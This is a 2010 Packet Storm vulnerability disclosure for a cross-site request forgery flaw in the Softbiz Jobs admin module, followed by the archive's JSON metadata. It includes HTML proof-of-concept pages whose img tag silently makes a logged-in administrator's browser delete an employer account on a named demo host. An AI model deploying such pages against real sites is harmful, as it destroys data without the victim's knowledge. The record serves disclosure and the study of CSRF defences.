ID PACKETSTORM:86597 Type packetstorm Reporter Pratul Agrawal Modified 2010-02-24T00:00:00
Description
`
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in: Admin module (delete_employer.php, a state-changing GET endpoint)
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts
# URL http://demos1.softbiz.com/scripts/seojobs/admin/
# Proof of concept
Proof-of-concept page that deletes a registered employer account through cross-site request forgery (CSRF). The deletion is triggered by a plain GET to delete_employer.php that carries no anti-CSRF token (none appears in the URL), so it succeeds whenever a browser that holds a logged-in administrator session loads attacker-controlled HTML containing the tag below.
...................................................................................................................
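<!--
  CSRF proof of concept for the Softbiz Jobs admin module.
  Precondition: the victim's browser holds a logged-in administrator session
  for the target site. Loading this page makes the browser issue a GET to
  delete_employer.php with the admin's cookies attached; the request carries
  no anti-CSRF token, so the employer with the given id is deleted.
  The src value is quoted so that the [USER ID] placeholder (which contains a
  space) or any id with special characters cannot break the tag; the original
  unquoted form would split the attribute at the space.
  Replace [USER ID] with the numeric id of the target employer.
-->
<html>
<body>
<img src="http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID]" />
</body>
</html>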
...................................................................................................................
Example (target employer id=20):
...................................................................................................................
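<!--
  Concrete instance of the CSRF proof of concept: deletes the employer with
  id=20. Only effective when loaded by a browser that is logged in to the
  admin module; the request is a plain GET with the admin's session cookies
  and no anti-CSRF token. The src value is quoted (the original was unquoted),
  which is the safe form for any id containing spaces or special characters.
-->
<html>
<body>
<img src="http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20" />
</body>
</html>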
...................................................................................................................
Once an administrator who is logged in to the admin module loads this page, refreshing the employer list shows that the user with id=20 has been deleted, without any confirmation or token check.
# If you have any questions, comments, or concerns, feel free to contact me.
`
{"sourceHref": "https://packetstormsecurity.com/files/download/86597/softbizjobs-xsrf.txt", "sourceData": "` \n \n \n \n======================================================================= \n \nSoftbiz Jobs CSRF Vulnerability \n======================================================================= \n \nby \n \nPratul Agrawal \n \n \n# Vulnerability found in- Admin module \n \n# email Pratulag@yahoo.com \n \n# company aksitservices \n \n# Credit by Pratul Agrawal \n \n# Download http://www.softbizscripts.com/ \n \n# Script softbizscripts \n \n# URL http://demos1.softbiz.com/scripts/seojobs/admin/ \n \n \n \n# Proof of concept \n \nScript to delete the registered user through Cross Site request forgery \n \n................................................................................................................... \n \n<html> \n \n<body> \n \n<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> \n \n</body> \n \n</html> \n \n \n................................................................................................................... \n \n \nExample- \n................................................................................................................... \n \n<html> \n \n<body> \n \n<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 /> \n \n</body> \n \n</html> \n \n \n................................................................................................................... \n \nAfter execution refresh teh page and u can see that user having id=20 get deleted automatically. \n \n \n#If you have any questions, comments, or concerns, feel free to contact me. 
\n`\n", "edition": 1, "references": [], "modified": "2010-02-24T00:00:00", "hash": "723dc7d730fa2f3a7c0abe99dde1a890045a52806c46a4d5cd593324613dca97", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/86597/Softbiz-Jobs-Cross-Site-Request-Forgery.html", "description": "", "id": "PACKETSTORM:86597", "reporter": "Pratul Agrawal", "lastseen": "2016-11-03T10:22:37", "published": "2010-02-24T00:00:00", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-11-03T10:22:37"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:37"}, "vulnersScore": 0.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Softbiz Jobs Cross Site Request Forgery", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "adf2eccd37302491966cf78dcbc7d42b", "key": "href"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "b8a17c54fad8f9fe04b8c825b00819e4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ce736cfd61e25f56ecd46eef1332867a", "key": "reporter"}, {"hash": "cebb775379511f0fba6e520b245c5c93", "key": "sourceData"}, {"hash": "e3ea5f0f2a0b52aec009060f1ea392e0", "key": "sourceHref"}, {"hash": "d1d64cd88c9688ea7c2f2cfa252cdf9d", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}